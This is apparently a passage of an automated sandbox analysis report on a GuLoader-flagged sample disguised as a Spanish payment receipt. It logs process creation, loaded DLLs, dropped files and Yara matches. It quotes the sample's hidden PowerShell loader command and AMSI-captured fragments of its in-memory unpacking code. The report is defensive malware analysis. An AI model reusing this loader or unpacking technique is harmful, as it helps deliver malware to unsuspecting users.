Source: C:\Windows\SysWOW64\dxdiag.exe	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\comprobante de pago.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe

File written: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Haandevendinger.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: comprobante de pago.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.1867873766.00000000077DA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb)Rr source: powershell.exe, 00000001.00000002.1873084908.00000000089E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb>Ck source: powershell.exe, 00000001.00000002.1873084908.00000000089E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbs source: powershell.exe, 00000001.00000002.1867873766.00000000077DA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.1877174929.000000000AD60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1872004874.0000000008750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1865523536.0000000006437000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1301557595.000000000279E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Besvrliggjort.Van133, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nsx731E.tmp, type: DROPPED

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((anniversalily $Regulatress $Taljeringens), (Niddingerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Partikammerats = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($genindlggelsen)), $Cabezone).DefineDynamicModule($Materialevandringers, $false).DefineType($Derouterne, $Udstoppede, [System.Multicast

Suspicious powershell command line found

Source: C:\Users\user\Desktop\comprobante de pago.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"
Source: C:\Users\user\Desktop\comprobante de pago.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0334A4E0 pushfd ; ret	1_2_0334A4E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0334E9F9 push eax; mov dword ptr [esp], edx	1_2_0334EA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0987285E push 8BD38B50h; iretd	1_2_09872866

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
